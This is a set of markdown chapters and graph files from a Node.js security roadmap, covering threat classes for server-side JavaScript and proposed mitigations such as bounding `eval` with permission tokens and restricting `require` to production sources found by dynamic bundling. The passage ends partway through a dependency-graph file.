[babel-core dyn load]: https://github.com/babel/babel/blob/cb8c4172ef740aa562f0873d602d800c55e80c6d/packages/babel-core/src/transformation/file/index.js#L421-L424
[colors dyn load]: https://github.com/Marak/colors.js/blob/9f3ace44700b8e705cb15be4767845c311b3ae11/lib/colors.js#L135-L138
[browserlist dyn load]: https://github.com/ai/browserslist/blob/3e7ed2431d781ce0ff7eade1e2b24780c592b50e/index.js#L776-L780
[express dyn load]: https://github.com/expressjs/express/blob/351396f971280ab79faddcf9782ea50f4e88358d/lib/view.js#L81
[prior art]: https://github.com/nodesecurity/eslint-plugin-security/blob/master/README.md#detect-non-literal-require
[diff fuzz]: https://www.blackhat.com/docs/eu-17/materials/eu-17-Arnaboldi-Exposing-Hidden-Exploitable-Behaviors-In-Programming-Languages-Using-Differential-Fuzzing-wp.pdf
[EXF]: threat-EXF.md
[modules spec]: http://wiki.commonjs.org/wiki/Modules/1.1


================================================
FILE: chapter-1/threats.md
================================================
# Threat environment

The threat environment for Node.js is similar to that for other runtimes that
are primarily used for microservices and web frontends, but there are some
Node.js specific concerns.

We define both kinds of threats in this section.  A reader familiar with
web-application security can skip all but this page and the discussion
of [*unintended require*][UIR] without missing much, but may find it
helpful to refer back to the table below when reading later chapters.

## Server vs Client-side JavaScript

Before we discuss the threat environment, it's worth noting that the threat
environment for server-side JavaScript is quite different from that for
client-side JavaScript.  For example,

* Client-side JavaScript runs in the context of the
  [same-origin policy][] possibly with a
  [Content-Security-Policy][CSP] which governs which code can load.
  Server-side JavaScript **code loading** is typically only
  constrained by the files on the server, and the values that can
  reach `require(...)`, `eval(...)` and similar operators.
* Client-side JavaScript typically only has access to data that the
  human using the browser should have access to.  On the server,
  applications are responsible for **data [compartmentalization][]**,
  and server-side JavaScript often has privileged access to storage
  systems and other backends.
* **File-system access** by the client typically either requires human
  interaction
  (`<input type=file>`, `Content-disposition:attachment`), or can only access
  a directory dedicated to third-party content (browser cache, local storage)
  and which is not usually on a list like `$PATH`.
  On the server, the Node runtime process's privileges determine
  [file-system access][nodejs/fs].
* Client-side JavaScript has no concept of a **shell** that converts
  strings into commands that run outside the JavaScript engine.
  Server-side JavaScript can spawn
  [child processes][nodejs/child_process] that operate on data
  received over the network, and on data that is accessible to the
  Node runtime process.
* **Network messages** sent by server-side JavaScript originate inside
  the server's LAN, but those sent by client-side JavaScript typically do not.
* **Shared memory concurrency** in client-side JavaScript happens via
  well-understood APIs like `SharedArrayBuffer`.  Experimental modules
  ([code][threads-a-gogo]) and a [workers proposal][]
  allow server-side JavaScript to fork threads; it is
  unclear how widespread these are in production or how
  [susceptible][thread corner cases] these are to memory corruption
  or exploitable race conditions.
* Client-side, the browser halts all scripts in a document when a
  single event loop cycle **runs too long**.
  Node.js has few ways to manage runaway computations on the server.
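One of the few built-in tools is the `timeout` option of Node.js's `vm` module, which interrupts synchronous script execution after the given number of milliseconds. A minimal sketch follows, with a hypothetical `runBounded` helper. Note its limits: the Node.js documentation states that `vm` is not a security mechanism, and the timeout does not cover asynchronous work that the script schedules.

```js
const vm = require('vm');

// Runs `code` in a fresh context and aborts it if its synchronous part
// runs longer than `ms` milliseconds.
function runBounded(code, ms) {
  return vm.runInNewContext(code, {}, { timeout: ms });
}

console.log(runBounded('6 * 7', 50)); // 42
try {
  runBounded('while (true) {}', 50);  // runaway loop is interrupted
} catch (e) {
  console.log(e.message);
}
```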

The threat environment for server-side JavaScript is much closer to
that for any other server-side framework than to that for JavaScript
in the browser.

## Classes of Threats {#threat_table}

The table below lists broad classes of vulnerabilities, and for each,
a short identifier by which we refer to the class later in this
document.  This list is not meant to be comprehensive, but we expect
that a thorough security assessment would touch on most of these, and
we would have low confidence in an assessment that skips many.

The frequency and severity of vulnerabilities are guesstimates since
we have little hard data on the frequency of these in Node.js
applications, so we have extrapolated from similar systems.  For example,
see discussion about frequency in [buffer overflow][BOF].

For each, relevant mitigation strategies appear in the Mitigations
column and link to the discussion.

| Shorthand | Description                                                                           | Frequency | Severity | Mitigations                 |
| --------- | ------------------------------------------------------------------------------------- | --------- | -------- | --------------------------- |
| [0DY][]   | Zero-day.  Attackers exploit a vulnerability before a fix is available.               | Low-Med   | Med-High | [cdeps][m-cd] [fail][m-fa]  |
| [BOF][]   | Buffer overflow.                                                                      | Low       | High     | [ovrsi][m-os]               |
| [CRY][]   | Misuse of crypto leads to poor access-control decisions or data leaks.                | Medium    | Medium   | [ovrsi][m-os]               |
| [DEX][]   | Poor developer experience slows or prevents release of features.                      | ?         | ?        | [dynam][m-dy] [ovrsi][m-os] |
| [DOS][]   | Denial of service                                                                     | Medium    | Low-Med  | TBD                         |
| [EXF][]   | Exfiltration of data, e.g. by exploiting reflection to serialize more than intended.  | Med-High  | Low-Med  | [ovrsi][m-os]               |
| [LQC][]   | Using low-quality dependencies leads to an exploit.                                   | Medium    | Low-Med  | [kdeps][m-kd] [ovrsi][m-os] |
| [MTP][]   | Theft of commit rights or MITM causes `npm install` to fetch malicious code.          | Low       | Med-High | [kdeps][m-kd] [cdeps][m-cd] |
| [QUI][]   | Query injection on a production machine.                                              | Medium    | Med-High | [ovrsi][m-os] [qlang][m-ql] |
| [RCE][]   | Remote code execution, e.g. via `eval`.                                               | Med-High  | High     | [dynam][m-dy] [ovrsi][m-os] |
| [SHP][]   | Shell injection on a production machine.                                              | Low       | High     | [ovrsi][m-os] [cproc][m-cp] |
| [UIR][]   | `require(untrustworthyInput)` loads code not intended for production.                 | Low       | Low-High | [dynam][m-dy]               |


## Meltdown and Spectre

As of this writing, the security community is trying to digest
the implications of *Meltdown* and *Spectre*.  The
[Node.js blog][Meltdown Spectre Impact] addresses them from a
Node.js perspective, so we do not comment in depth.

It is worth noting, though, that these vulnerabilities lead to
breaches of *confidentiality*.  While confidentiality violations
are serious, the suggestions that follow use design principles
that prevent a violation of confidentiality from causing a
violation of *integrity*.  Specifically:

*  Knowing a whitelist of production source hashes does not
   allow an attacker to cause a non-production source to load.
*  Our runtime `eval` mitigation relies on JavaScript reference
   equality, not knowledge of a secret.


[same-origin policy]: https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy
[CSP]: https://developers.google.com/web/fundamentals/security/csp/
[compartmentalization]: https://cwe.mitre.org/data/definitions/653.html
[nodejs/fs]: https://nodejs.org/api/fs.html
[nodejs/child_process]: https://nodejs.org/api/child_process.html
[threads-a-gogo]: https://github.com/xk/node-threads-a-gogo/blob/74005641d53b0d85e8d75e2506eddbded15f5112/src/threads_a_gogo.cc#L1387
[workers proposal]: https://github.com/nodejs/worker/issues/2
[thread corner cases]: https://github.com/nodejs/worker/issues/4#issuecomment-306090967
[Query Injection]: https://cwe.mitre.org/data/definitions/89.html
[0DY]: threat-0DY.md
[BOF]: threat-BOF.md
[CRY]: threat-CRY.md
[DEX]: threat-DEX.md
[DOS]: threat-DOS.md
[EXF]: threat-EXF.md
[LQC]: threat-LQC.md
[MTP]: threat-MTP.md
[QUI]: threat-QUI.md
[RCE]: threat-RCE.md
[SHP]: threat-SHP.md
[UIR]: threat-UIR.md
[m-dy]: ../chapter-2/dynamism.md
[m-kd]: ../chapter-3/knowing_dependencies.md
[m-cd]: ../chapter-4/close_dependencies.md
[m-os]: ../chapter-5/oversight.md
[m-fa]: ../chapter-6/failing.md
[m-cp]: ../chapter-7/child-processes.md
[m-ql]: ../chapter-7/query-langs.md
[Meltdown Spectre Impact]: https://nodejs.org/en/blog/vulnerability/jan-2018-spectre-meltdown/


================================================
FILE: chapter-2/bounded-eval.md
================================================
# Dynamically bounding `eval`

If we could provide an API that was available statically but not
dynamically, we could double-check uses of `eval` operators.

```js
// API for allowing some eval
var prettyPlease = require('prettyPlease');
// Carefully reviewed JavaScript generating code
var codeGenerator = require('codeGenerator');

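let compile;

// mayI calls its callback synchronously, so `compile` is assigned
// before the `exports.compile` line below runs.
prettyPlease.mayI(
    module,
    (evalPermission) => {
      compile = function (source) {
        const js = codeGenerator.generateCode(source);
        return prettyPlease.letMeEval(
            evalPermission,
            js,
            // Indirect eval: evaluates `js` in the global scope rather
            // than in this function's scope.
            () => ((0, eval)(js)));
      };
    });

exports.compile = compile;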
```

The `prettyPlease` module cannot be pure JavaScript.  Only the C++
code that embeds the JavaScript engine can register *CodeGeneration*
callbacks ([code][CodeGeneration callbacks]), the way CSP does
([code][CSP callback]) on the client.  Still, the definition would be
roughly:

```js
// prettyPlease module
(() => {
  const _PERMISSIVE_MODE = 0;  // Default
  const _STRICT_MODE = 1;
  const _REPORT_ONLY_MODE = 2;

  const _MODE = _PERMISSIVE_MODE;  // Placeholder: read from command line arguments
  const _WHITELIST = new Set(/* From command line arguments */);

  const _VALID_PERMISSIONS = new WeakSet();
  const _EVALABLE_SOURCES = new Map();

  if (_MODE !== _PERMISSIVE_MODE) {
    // Pseudocode: the code-generation callback installed when the
    // JavaScript engine is initialized.
    function codeGenerationCheckCallback(context, source) {
      // source must be a v8::Local<v8::String> or the ChakraCore
      // equivalent, so there is no risk of polymorphing.
      if (_EVALABLE_SOURCES.has(source)) {
        return true;
      }
      console.warn('prettyPlease: code generation from unapproved source');
      return _MODE === _REPORT_ONLY_MODE;
    }
  }

  // requestor -- the `module` value in the scope of the code requesting
  //      permissions.
  // callback -- called with the generated permission whether granted or
  //      not.  This puts the permission in a parameter name making it
  //      much less likely that an attacker who controls a key to obj[key]
  //      can steal it.
  module.exports.mayI = function (requestor, callback) {
    const id = String(requestor.id);
    const filename = String(requestor.filename);
    const permission = Object.create(null);  // Token used for identity
    // TODO: Needs privileged access to real module cache so a module
    // can't masquerade as another by mutating the module cache.
    if (_MODE !== _PERMISSIVE_MODE
        && requestor === require.cache[filename]
        && _WHITELIST.has(id)) {
      _VALID_PERMISSIONS.add(permission);
      // Typical usage is to request permission once during module load.
      // Removing from whitelist prevents later bogus requests after
      // the module is exposed to untrusted inputs.
      _WHITELIST.delete(id);
    }
    return callback(permission);
  };

  // permission -- a value received via mayI
  // sourceToEval -- code to eval.  The code generation callback will
  //                 expect this exact string as its source.
  // codeThatEvals -- a callback that will be called in a scope that
  //                  allows eval of sourceToEval.
  module.exports.letMeEval = function (permission, sourceToEval, codeThatEvals) {
    sourceToEval = String(sourceToEval);
    if (_MODE === _PERMISSIVE_MODE) {
      return codeThatEvals();
    }

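    if (!_VALID_PERMISSIONS.has(permission)) {
      console.warn('prettyPlease: letMeEval called without a valid permission');
      if (_MODE !== _REPORT_ONLY_MODE) {
        // Strict mode: run the callback without approving sourceToEval,
        // so the code-generation check rejects any eval it attempts.
        return codeThatEvals();
      }
      // Report-only mode: fall through and approve the source, so the
      // code-generation check does not warn a second time.
    }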

    const countBefore = _EVALABLE_SOURCES.get(sourceToEval) || 0;
    _EVALABLE_SOURCES.set(sourceToEval, countBefore + 1);
    try {
      return codeThatEvals();
    } finally {
      if (countBefore) {
        _EVALABLE_SOURCES.set(sourceToEval, countBefore);
      } else {
        _EVALABLE_SOURCES.delete(sourceToEval);
      }
    }
  };
})();
```

The `eval` operators, through the code-generation callback, would then
check that their argument is in the `_EVALABLE_SOURCES` set.
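The real check runs inside an engine callback, so plain JavaScript cannot demonstrate it directly. The sketch below simulates the flow under stated assumptions. `checkedEval` is a hypothetical stand-in for the code-generation callback. `grantPermission` replaces `mayI` and skips the whitelist and module-cache checks. Approval uses the same counted `Map` bookkeeping as `letMeEval` above.

```javascript
// Simulation only: checkedEval is a hypothetical stand-in for the engine's
// code-generation callback, which ordinary JavaScript cannot install.
const evalableSources = new Map();  // source text -> approval count
const validPermissions = new WeakSet();

// Simplified mayI: always grants (no whitelist or module-cache checks).
function grantPermission() {
  const permission = Object.create(null);  // Opaque identity token.
  validPermissions.add(permission);
  return permission;
}

// Mirrors codeGenerationCheckCallback in strict mode.
function checkedEval(source) {
  if (!evalableSources.has(source)) {
    throw new EvalError('Code generation from unapproved source');
  }
  return (0, eval)(source);  // Indirect eval: runs in global scope.
}

function letMeEval(permission, source, codeThatEvals) {
  source = String(source);
  if (!validPermissions.has(permission)) {
    return codeThatEvals();  // Source stays unapproved, so checkedEval throws.
  }
  const countBefore = evalableSources.get(source) || 0;
  evalableSources.set(source, countBefore + 1);
  try {
    return codeThatEvals();
  } finally {
    // Restore the previous approval state even if codeThatEvals throws.
    if (countBefore) {
      evalableSources.set(source, countBefore);
    } else {
      evalableSources.delete(source);
    }
  }
}
```

With a granted permission, `letMeEval(p, '1 + 1', () => checkedEval('1 + 1'))` evaluates the string. With any other object as the permission, the same call throws an `EvalError`. Afterwards the source is no longer approved in either case.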

Implicit access to `eval` is possible because reflective operators can
reach `eval`.  As long as we can prevent reflective access to
`evalPermission`, we can constrain what can be `eval`ed.  If
`evalPermission` is a function parameter, then only `arguments`
aliases it, so functions that do not mention the special name
`arguments` may safely receive one.  Most functions do not mention
`arguments`.  Before whitelisting a module, a reviewer would be wise
to check for any use of `arguments`, and for any escape of permissions
or `module`.
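The following illustrates why `arguments` deserves scrutiny. The function names and the `sink` callback are hypothetical. A function that never mentions `arguments` can only pass its permission on by naming the parameter, which a reviewer can spot. A function that hands out its `arguments` object leaks every parameter without naming any of them.

```javascript
// Hypothetical example: `sink` stands for any code that receives a value.
function carefulUser(evalPermission, sink) {
  sink('no permission here');  // The parameter is reachable only by name.
}

function leakyUser(evalPermission, sink) {
  sink(arguments);  // arguments[0] is evalPermission, so it escapes.
}

const token = Object.create(null);
let captured = null;
leakyUser(token, (args) => { captured = args[0]; });
// captured is now the same object as token.
```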

`evalPermission` is an opaque token &mdash; only its reference identity
is significant, so we can check membership in a `WeakSet` without
risk of forgery.
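The following sketch shows why forgery does not work. The names `grant` and `isGranted` are illustrative, not part of the proposal. `WeakSet` membership compares by reference, so an object that merely copies a token's contents or shape is not accepted. A `WeakSet` also holds its entries weakly, so issued tokens do not leak memory.

```javascript
// Tokens are prototype-less objects; only their identity matters.
const grantedTokens = new WeakSet();

function grant() {
  const token = Object.create(null);
  grantedTokens.add(token);
  return token;
}

function isGranted(candidate) {
  // Reference comparison: a look-alike object is a different object.
  return grantedTokens.has(candidate);
}

const real = grant();
// Same (empty) contents and same null prototype, but a new identity.
const forged = Object.assign(Object.create(null), real);
```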

This requires API changes to existing modules that dynamically use
`eval`, but the changes should be additive and straightforward.

It also lets project teams and security specialists decide, on a
case-by-case basis, which modules really need dynamic `eval`.

As with synthetic modules, frozen realms may provide a way to further
restrict what dynamically loaded code can do.  If you're trying to
decide whether to trust a module that dynamically loads code, you have
more ways to justifiably conclude that it's safe if the module loads
that code into a sandbox restricted to a limited, frozen API.

[CodeGeneration callbacks]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=626
[CSP callback]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=352


================================================
FILE: chapter-2/bundling.md
================================================
# Dynamic Bundling

Consider a simple Node application:

```js
// index.js
// Example that uses various require(...) use cases.

let staticLoad = require('./lib/static');
function dynamicLoad(f, x) {
  return f('./lib/' + x);
}
dynamicLoad(require, Math.random() < 2 ? 'dynamic' : 'bogus');
exports.lazyLoad = () => require('./lib/lazy');

// Fallback to alternatives
require(['./lib/opt1', './lib/opt2'].find(
    (name) => {
      try {
        require.resolve(name);
        return true;
      } catch (_) {
        return false;
      }
    }));
```

with some unit tests:

```js
// test/test.js

var expect = require("chai").expect;
var app = require("../index");

describe("My TestSuite", () => {
  describe("A test", () => {
    it("A unittest", () => {
      // Exercise the API
      app.lazyLoad();
    });
  });
});
```

We hack `updateChildren`, which gets called by `Module._load` for new
modules and when a module requires a cached module, to dump information
about loads:

```diff
diff --git a/lib/module.js b/lib/module.js
index cc8d5097bb..945ab8a4a8 100644
--- a/lib/module.js
+++ b/lib/module.js
@@ -59,8 +59,18 @@ stat.cache = null;

 function updateChildren(parent, child, scan) {
   var children = parent && parent.children;
-  if (children && !(scan && children.includes(child)))
+  if (children && !(scan && children.includes(child))) {
+    if (parent.filename && child.id) {
+      // HACK: rather than require('fs') to write a file out, we
+      // log to the console.
+      // We assume the prefix will be removed and the result wrapped in
+      // a DOT digraph.
+      console.log(
+          'REQUIRE_LOG_DOT:    ' + JSON.stringify(parent.filename)
+          + ' -> ' + JSON.stringify(child.id) + ';');
+    }
     children.push(child);
+  }
 }
```
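Patching Node itself is not always practical. A rough userland approximation is to wrap `Module.prototype.require` from the built-in `module` module. This is a swapped-in technique, not the one used above, and it differs in ways that may matter:

* It records the request string rather than the resolved file name.
* It may log builtins and duplicate edges that the `updateChildren` hack skips.
* It only sees `require` calls made after it is installed, for example by preloading it with `node --require`.

```javascript
// Userland approximation: log each require call as a DOT edge.
const Module = require('module');

const edges = [];  // e.g. "/app/index.js" -> "./lib/static";
const originalRequire = Module.prototype.require;

Module.prototype.require = function (request) {
  const exported = originalRequire.call(this, request);
  edges.push(
      JSON.stringify(String(this.filename))
      + ' -> ' + JSON.stringify(request) + ';');
  return exported;
};
```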

Running the tests and extracting the graph ([code][extract-script])
gives us a rather [hairy dependency graph](example/graphs/full.svg):

<img title="Files loaded by `npm test`" src="example/graphs/full.svg" width=800 height=100>

We add an edge from `"./package.json"` to the module's main file.
Then we filter edges ([code][graph-filter]) to include only those
reachable from `"./package.json"`.  This lets us distinguish files
loaded by the test runner and tests from those loaded after control
has entered an API in a production file.
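The repository's filter is the shell script linked above. The JavaScript sketch below shows the same idea, a reachability search from `"./package.json"`. It assumes the `REQUIRE_LOG_DOT:` output has already been parsed into `[from, to]` pairs. `reachableEdges` is a hypothetical helper.

```javascript
// Keep only edges whose source node is reachable from root.
function reachableEdges(edges, root) {
  const outgoing = new Map();
  for (const [from, to] of edges) {
    if (!outgoing.has(from)) outgoing.set(from, []);
    outgoing.get(from).push(to);
  }
  // Breadth-first search from the root node.
  const seen = new Set([root]);
  const queue = [root];
  while (queue.length > 0) {
    const node = queue.shift();
    for (const next of outgoing.get(node) || []) {
      if (!seen.has(next)) {
        seen.add(next);
        queue.push(next);
      }
    }
  }
  return edges.filter(([from]) => seen.has(from));
}
```

Edges that start in the test runner or the tests, such as `./test/test.js -> ./index.js`, are dropped. `./test/test.js` is never reached from `"./package.json"`.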

The resulting graph is much simpler:

![Production Source Files](example/graphs/filtered.svg)

Note that the production file list includes dynamically and lazily
loaded files.  It includes `./lib/opt2.js` but not `./lib/opt1.js`.
`./lib/opt1.js` does not exist, so the `find` call, which picks the
first available alternative, skips it and selects `./lib/opt2.js`.

Our production source list should include all the files we need
in production if

*  The unit tests `require` the main file
*  The unit tests have enough coverage to load all modules required
   in production via APIs defined in the main file or in APIs
   transitively loaded from there.

It is definitely possible to miss some files.  If the unit test did
not call `app.lazyLoad` then there would be no edge to
`./lib/lazy.js`.  To address this, developers can

*  Expand test coverage to exercise code paths that load the
   missing source files.
*  Or add an explicit whitelist like
   ```js
   // production-source-whitelist.js
   require('./index.js');
   require('./lib/lazy.js');
   ```
   and explicitly pass this as the main file to the filter
   instead of defaulting to the one specified in `package.json`.

Dynamic analysis is not perfect, but a missing source file is
readily apparent, so this replaces

*  hard-to-detect bugs with potentially severe security consequences,

with

*  easy-to-detect bugs with negligible security consequences.

[extract-script]: https://github.com/google/node-sec-roadmap/blob/master/chapter-2/example/make_dep_graph.sh
[graph-filter]: https://github.com/google/node-sec-roadmap/blob/6130b76446ff4efbb276d8128c12e41ea2fffbc9/chapter-2/example/make_dep_graph.sh#L39-L73


================================================
FILE: chapter-2/dynamism.md
================================================
# Dynamism when you need it

## Background

Node.js code is composed of CommonJS modules that are linked together
by the builtin `require` function, or [`import`][import-js] statements
(used by [TypeScript][import-ts]) that typically transpile to
`require` (modulo [experimental features][esm]).

`require` itself calls `Module._load` ([code][Module._load]) to
resolve and load code.  ["The Node.js Way"][FKS] explains this flow
well.

Unlike `import`, `require` is dynamic: a runtime value can specify the
name of a module to load.  (The ECMAScript committee is considering a
[dynamic `import` operator][import-op-strawman], but we have
not included that in this analysis.)


This dynamism is powerful and flexible and enables varied use cases
like the following:

*   Lazy loading.  Waiting to load a dependency until it is definitely needed.
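    ```js
    const infrequentlyUsedAPI = (function () {
      let dependency = null;
      return function infrequentlyUsedAPI() {
        // Load the dependency on first call, not when this file loads.
        if (dependency === null) {
          dependency = require('dependency');
        }
        // Use dependency
      };
    }());
    ```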
*   Loading plugins based on a configuration object.
    ```js
    function Service(config) {
      (config.plugins || []).forEach(
          (pluginName) => {
            require(pluginName).initPlugin(this);
          });
    }
    ```
*   Falling back to an alternate service provider if the first choice
    isn't available:
    ```js
    const KNOWN_SERVICE_PROVIDERS = ['foo-widget', 'bar-widget'];
    const serviceProviderName = KNOWN_SERVICE_PROVIDERS.find(
       (name) => {
         try {
           require.resolve(name);
           return true;
         } catch (_) {
           return false;
         }
       });
    const serviceProvider = require(serviceProviderName);
    ```
*   Taking advantage of an optional dependency when it is available.
    ```js
    let optionalDependency = null;
    try {
      optionalDependency = require('optionalDependency');
    } catch (_) {
      // Oh well.
    }
    ```
*   Loading a handler for a runtime value based on a naming convention.
    ```js
    function handle(request) {
      const handlerName = request.type + '-handler';  // Documented convention
      let handler;
      try {
        handler = require(handlerName);
      } catch (e) {
        throw new Error(
            'Expected handler ' + handlerName
            + ' for requests with type ' + request.type);
      }
      return handler.handle(request);
    }
    ```
*   Introspecting over module metadata.
    ```js
    const version = require('./package.json').version;
    ```

During rapid development, [file-system monitors][nodemon] can restart
a node project when source files change, and the application stitches
itself together without the complex compiler and build system
integration that statically compiled languages use to do incremental
recompilation.


## Problem

Threats: [DEX][] [RCE][] [UIR][]

The `node_modules` directory does not keep production code separate
from test code.  If test code can be `require`d in production, then
an attacker may find it far easier to execute a wide variety of other
attacks.  See [UIR][] for more details on this.

Node applications rely on dynamic uses of `require`.  Changes that
break any of these use cases would require coordinating large-scale
changes to existing code, tools, and development practices, which
threatens [developer experience][DEX].

Requiring developers to pick and choose which source files are
production and which are test would lead them to do one of the
following:

*  Scrutinize source files not only for their own project
   but also for deep dependencies with which they are unfamiliar,
   leading to poor developer experience.
*  Whitelist without scrutiny, reintroducing the original security problem.
*  Avoid available modules that solve their problems and instead
   roll their own, leading to poor developer experience and possibly
   [LQC][] problems.

We need to ensure that only source code written with production
constraints in mind loads in production without increasing the burden
on developers.

When the behavior of code in production is markedly different from that
on a developer's workstation, developers lose confidence that they
can avoid bugs in production by testing locally.  This may lead
to poor developer experience and lower-quality code.


## Success Criteria

We would have prevented abuse of `require` if:

*  Untrusted inputs could not cause `require` to load a
   non-production source file,
*  and/or no non-production source files are reachable by
   `require`,
*  and/or loading a non-production source file has no adverse effect.
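The following is a minimal sketch of the first criterion at a single call site. It assumes an allowlist of resolved paths was produced ahead of time. `makeGuardedRequire` is a hypothetical helper, not a Node.js API. It only protects code that calls it, so it does not replace the loader-level changes discussed in this chapter.

```javascript
// Only load modules whose resolved path appears on a precomputed allowlist.
function makeGuardedRequire(allowedResolvedPaths) {
  return function guardedRequire(name) {
    // Resolve first, so './x' and '/abs/path/x.js' compare consistently.
    const resolved = require.resolve(name);
    if (!allowedResolvedPaths.has(resolved)) {
      throw new Error('Refusing to load non-production module: ' + resolved);
    }
    return require(resolved);
  };
}
```

For built-in modules, `require.resolve` returns the bare name, for example `'path'`. An allowlist of `new Set(['path'])` therefore admits `guardedRequire('path')` and rejects `guardedRequire('os')`.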

We would have successfully prevented abuse of `eval`, `new Function`
and related operators if:

*  Untrusted inputs cannot reach an `eval` operator,
*  and/or untrusted inputs that reach them cause no adverse effects,
*  and/or security specialists could whitelist uses of `eval` operators
   that are necessary for the functioning of the larger
   system and compatible with the system's security goals.

In both cases, converting dynamic operators to static before untrusted
inputs reach the system reduces the attack surface.  Requiring
large-scale changes to existing npm modules, or large-scale
rewrites of code that uses them, compromises [DEX][].


## Current practices

Some development teams use [webpack][] or similar tools to statically
bundle server-side modules, and provide flexible transpilation
pipelines.  That's a great way to do things, but solving security
problems only for teams with development practices mature enough to
deploy via webpack risks preaching to the choir.

Webpack, in its minimal configuration, does not attempt to skip
test files ([code][webpack-experiment]).
Teams with an experienced webpack user can use it to great effect, but
it is not an out-of-the-box solution.

Webpacking does not prevent calls to `require(...)` with unintended
arguments, but greatly reduces the chance that they will load
non-production code.  As long as the server process cannot read
JS files other than those in the bundle, then a webpacked server
is safe from [UIR][].  This may not be the case if the production
machine has npm modules globally installed, and the server process
is not running in a [chroot jail][].


## A Possible Solution

We present one possible solution to demonstrate that tackling this
problem is feasible.

If we can compute the entire set of `require`-able sources when
dealing only with inputs from trusted sources, then we can
ensure that the node runtime only loads those sources even when
exposed to untrusted inputs.

We propose these changes:

*  A two phase approach to prevent abuse of `require`.
   1. Tweaks to the node module loader that make it easy to
      [dynamically bundle](bundling.md) a release candidate.
   2. Tweaks to the node module loader in production to restrict
      code loads based on [source content hashes](source-contents.md)
      from the bundling phase.
*  Two different strategies for preventing abuse of
   [`eval`](what-about-eval.md).
   *  JavaScript idioms that can allow many uses of `eval` to
      [load as modules](synthetic-modules.md) and to bundle as above.
   *  Using JavaScript engine callbacks to
      [allow uses of `eval`](bounded-eval.md) by approved modules.
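The following illustrates the check behind the second bundling phase. It assumes sources are identified by their SHA-256 digest; the hash function and the helper names `sourceHash`, `buildAllowlist`, and `checkSource` are assumptions, not taken from the proposal. A real implementation would hook the module loader; this sketch shows only the comparison.

```javascript
const crypto = require('crypto');

// Hex SHA-256 digest of a source file's contents.
function sourceHash(sourceText) {
  return crypto.createHash('sha256').update(sourceText, 'utf8').digest('hex');
}

// Bundling phase: record hashes of every source loaded while testing.
function buildAllowlist(productionSources) {
  return new Set(productionSources.map(sourceHash));
}

// Production phase: reject any source whose hash was not recorded,
// regardless of its file name or location.
function checkSource(allowlist, sourceText) {
  if (!allowlist.has(sourceHash(sourceText))) {
    throw new Error('Source not in production allowlist');
  }
  return sourceText;
}
```

Keying on content rather than file name means that renaming or copying a test file does not make it loadable. Only sources whose exact bytes were seen during bundling pass.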

[DEX]: ../chapter-1/threat-DEX.md
[LQC]: ../chapter-1/threat-LQC.md
[RCE]: ../chapter-1/threat-RCE.md
[UIR]: ../chapter-1/threat-UIR.md
[webpack]: https://webpack.js.org/
[Symbol]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol
[import-js]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import
[import-ts]: https://www.typescriptlang.org/docs/handbook/modules.html#import
[Module._load]: https://github.com/nodejs/node/blob/0fdd88a374e23e1dd4a05d93afd5eb0c3b080fd5/lib/module.js#L449
[FKS]: http://fredkschott.com/post/2014/06/require-and-the-module-system/
[esm]: https://nodejs.org/api/esm.html#esm_ecmascript_modules
[nodemon]: https://nodemon.io/
[import-op-strawman]: https://github.com/tc39/proposal-dynamic-import
[chroot jail]: https://help.ubuntu.com/community/BasicChroot
[webpack-experiment]: https://github.com/google/node-sec-roadmap/tree/master/chapter-2/experiments/webpack-compat


================================================
FILE: chapter-2/example/.gitignore
================================================
node_modules


================================================
FILE: chapter-2/example/graphs/filtered.dot
================================================
digraph Modules {
    "./package.json" [fillcolor=black,fontcolor=white,style=filled];
    "./index.js" -> "./lib/static.js";
    "./index.js" -> "./lib/dynamic.js";
    "./index.js" -> "./lib/opt2.js";
    "./index.js" -> "./lib/lazy.js";
    "./package.json" -> "./index.js";
}


================================================
FILE: chapter-2/example/graphs/full.dot
================================================
digraph Modules {
    "./node_modules/mocha/bin/mocha" -> "./node_modules/mocha/bin/options.js";
    "./node_modules/mocha/bin/_mocha" -> "./node_modules/commander/index.js";
    "./node_modules/mocha/bin/_mocha" -> "./node_modules/mocha/index.js";
    "./node_modules/mocha/index.js" -> "./node_modules/mocha/lib/mocha.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/escape-string-regexp/index.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/reporters/index.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/base.js" -> "./node_modules/diff/lib/index.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/base.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/character.js";
    "./node_modules/diff/lib/diff/character.js" -> "./node_modules/diff/lib/diff/base.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/word.js";
    "./node_modules/diff/lib/diff/word.js" -> "./node_modules/diff/lib/diff/base.js";
    "./node_modules/diff/lib/diff/word.js" -> "./node_modules/diff/lib/util/params.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/line.js";
    "./node_modules/diff/lib/diff/line.js" -> "./node_modules/diff/lib/diff/base.js";
    "./node_modules/diff/lib/diff/line.js" -> "./node_modules/diff/lib/util/params.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/sentence.js";
    "./node_modules/diff/lib/diff/sentence.js" -> "./node_modules/diff/lib/diff/base.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/css.js";
    "./node_modules/diff/lib/diff/css.js" -> "./node_modules/diff/lib/diff/base.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/json.js";
    "./node_modules/diff/lib/diff/json.js" -> "./node_modules/diff/lib/diff/base.js";
    "./node_modules/diff/lib/diff/json.js" -> "./node_modules/diff/lib/diff/line.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/array.js";
    "./node_modules/diff/lib/diff/array.js" -> "./node_modules/diff/lib/diff/base.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/patch/apply.js";
